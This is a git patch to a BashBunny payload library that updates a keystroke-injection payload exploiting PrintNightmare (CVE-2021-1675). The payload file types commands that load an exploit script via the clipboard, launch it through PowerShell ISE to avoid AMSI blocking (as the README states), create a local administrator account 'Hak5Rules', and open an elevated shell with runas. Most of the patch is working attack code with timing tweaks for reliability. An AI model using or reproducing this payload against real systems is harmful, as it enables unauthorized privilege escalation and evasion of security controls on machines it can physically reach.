From efb5f63ad89c4565a68c20727cd42d8347e6f49b Mon Sep 17 00:00:00 2001 From: panicacid Date: Mon, 5 Jul 2021 02:33:36 +0100 Subject: [PATCH] Bugfix (#433) * New Payload Added new PrintNightmare Payload (Quick and dirty) * Fixed my potty mouth I'm a child sometimes * Renamed Payload * PrintNightmare: Use SWITCH_POSITION in payload path * Fixing a typo * Added Delays Added some delays due to the fact that it was inconsistently reliable, occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required. * Amending Version Number I'm a fool * Updated Readme with proper credit Co-authored-by: Marc --- .../library/execution/PrintNightmare/README.md | 17 ++++++++++++++--- .../execution/PrintNightmare/payload.txt | 17 ++++++++++++----- 2 files changed, 26 insertions(+), 8 deletions(-) diff --git a/payloads/library/execution/PrintNightmare/README.md b/payloads/library/execution/PrintNightmare/README.md index 022ab13c..0c3814e3 100644 --- a/payloads/library/execution/PrintNightmare/README.md +++ b/payloads/library/execution/PrintNightmare/README.md @@ -1,6 +1,17 @@ -# PrintNightmare-BB-Payload -PrintNightmare Payload for the Hak5 BashBunny -Building a quick and dirty condenced verison of https://github.com/calebstewart/CVE-2021-1675 for the Hak5 BashBunny +Title: PrintNightmare +Author: PanicACid +Version: 1.1 + +Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator + +As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! + +Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and Foxtrot for putting up with my nonsense. + + +# Purple.............Loading +# Green .............Execute +# Off................Finished Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard. diff --git a/payloads/library/execution/PrintNightmare/payload.txt b/payloads/library/execution/PrintNightmare/payload.txt index 337e9648..614187e4 100644 --- a/payloads/library/execution/PrintNightmare/payload.txt +++ b/payloads/library/execution/PrintNightmare/payload.txt @@ -1,6 +1,6 @@ # Title: Quick and Dirty PrintNightmare -# Author: PanicAcid -# Version: 1.0 +# Author: PanicACid +# Version: 1.1 # # Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator # As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole @@ -37,8 +37,12 @@ QUACK ENTER QUACK DELAY 100 QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))" QUACK ENTER +QUACK DELAY 500 +QUACK STRING exit +QUACK ENTER +QUACK DELAY 500 QUACK GUI r -QUACK DELAY 300 +QUACK DELAY 500 QUACK STRING powershell_ise.exe QUACK ENTER QUACK DELAY 4000 @@ -46,21 +50,24 @@ QUACK CONTROL d QUACK CONTROL v QUACK CONTROL d QUACK ENTER +QUACK DELAY 2000 QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'" QUACK ENTER +QUACK DELAY 4000 QUACK ALT F4 QUACK GUI r -QUACK DELAY 150 +QUACK DELAY 500 QUACK STRING cmd QUACK DELAY 150 QUACK ENTER QUACK DELAY 150 -QUACK STRING runas /user:Hak5Rules cmd.exe +QUACK STRING "runas /user:Hak5Rules cmd.exe && exit" QUACK ENTER QUACK DELAY 150 QUACK STRING Hak5Rules QUACK DELAY 150 QUACK ENTER + #----------------------------------- # Kill the lights - finished LED FINISH